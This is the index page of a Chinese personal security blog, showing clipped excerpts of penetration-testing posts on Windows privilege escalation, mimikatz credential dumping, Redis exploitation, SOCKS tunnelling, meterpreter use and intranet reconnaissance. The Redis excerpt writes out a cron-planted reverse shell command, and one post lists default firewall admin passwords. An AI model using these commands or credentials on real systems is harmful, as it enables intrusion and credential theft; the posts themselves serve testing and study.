刘功瑞的博客

有一天你突然惊醒,发现这一切,都只不过是一场梦。

在Metasploit下利用ms16-075提权

1.1.1 ms16-075漏洞简介及利用前提1.ms16-075漏洞简介Windows SMB 服务器特权提升漏洞(CVE漏洞编号:CVE-2016-3225)当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞,成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。若要利用此漏洞,攻击者首先必须登录系统。然后,攻击者可以运行一个为利用此漏洞而经特殊设计的应用程序,从而控制受影响的系统。此更新通过更正Windows服务

教你多姿势抓取Windows明文或Hash,快收藏!

渗透测试,可用于测试企业单位内网的安全性,而获取Windows的明文或Hash往往是整个渗透测试过程中重要的一环,一旦某台机器的密码在内网中是通用的,那么该内网的安全性将会非常糟糕。本期安仔课堂,ISEC实验室的李老师为大家介绍一些抓取Windows明文或Hash的方式。一、mimikatzmimikatz是一款轻量级的调试神器,功能非常强大,其中最常用的功能就是抓取明文或Hash。用法:mimikatz.exe "privilege::debug" "sekurl

redis未授权漏洞和主从复制rce漏洞利用

 未授权无需认证访问内部数据库。利用计划任务反弹shell12345redis-cli -h 192.168.2.6set x "\n* * * * * bash -i >& /dev/tcp/192.168.1.1/4444 0>&1\n"config set dir /var/spool/cron/config set dbfilename rootsave获取webshel

如何通过EW做Socks5代理进行内网渗透

0x00 前言最近搞站的时候有内网穿透的需求,大佬向我推荐了EW,本文模拟一个攻击场景对Earthworm的使用方法做一个简单的介绍。其实相应的内容EW的官网已经说得很详细了,我这里纯粹是作为个人笔记从如下几个方面做一个简单的记录:1、如何使用EW做反向Socks5代理2、浏览器如何设置Socks5代理访问目标内网Web服务3、利用proxychains给终端设置Socks5代理(方便将本地命令行工具的流量代理进目标内网)0x01 基础环境及网络拓扑Kali Linux(Attacker 内网

关于 EW 的介绍

下图是一张示意图:该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内,更多平台的支持还在维护中,敬请期待。使用方法:以下所有样例,如无特殊说明代理端口均为1080,服务均为SOCKSv5代理服务.该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_

让BurpSuite使用MSF的socks4a代理

前言最近在使用msf转发流量时遇到了个问题,就是使用auxiliary/server/socks4a做代理时,burpsuite不支持socks4a代理,导致无法使用burp去抓包。而使用auxiliary/server/socks5做代理却失败了,可能是脚本的bug,官方issues也有人反馈这个问题。具体问题演示环境我所在的环境比较特殊,工作机(192.168.1.2,Windows)位于A地内网,MSF机器(172.16.1.2,Linux)位于B地内网,两内网不相通,但是可以通过11.1

MSF 内网渗透笔记

进入meterpreter模式在meterpreter中输入shell即可进入CMD窗口接着即可执行CMD命令,例如打开RDP服务REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f meterpreter模式1、输入screenshot截个图看看主人在干什么吧。2、wdigest /

内网信息收集

后渗透攻防:https://www.secpulse.com/archives/51527.htmlhttps://3gstudent.github.io/目录一、内网信息收集1.内网基础信息:2.内网核心业务信息:3.其他信息二、内网实战(命令、工具及脚本)1.用户列表、当前权限等2.内网网络拓扑等信息3.进程列表4.端口信息5.补丁信息6.本地用户习惯7.凭证收集8.系统哈希或明文密码获取9.星号查看三、内网权限拓展(常见应用漏洞):一、内网信息收集1.内网基础信息:(1)内网网段信息:网段

用proxychains-ng为程序设置代理

简易安装#下载 git clone https://github.com/rofl0r/proxychains-ng.git #编译安装 cd proxychains-ng ./configure make && make install #拷贝配置文件 cp ./src/proxychains.conf /etc/proxychains.conf #删除目录(可不执行) cd&nb

国内防火墙默认账户密码

天融信防火墙,不需要证书登录地址:https://192.168.1.254用户名:superman密码:talent技术支持热线:8008105119天融信防火墙,不需要证书登录地址:https://192.168.1.254:8080用户名:superman密码:talent!23遇到设备需要把旧设备配置备份下来,再倒入新设备基于console口登陆,用户名,密码跟web界面一致system config reset 清除配置save 保存联想网御防火墙,需要证书(最好用IE浏览器

Powered By Z-BlogPHP 1.5.2 Zero

Copyright www.liugongrui.com.All Rights Reserved.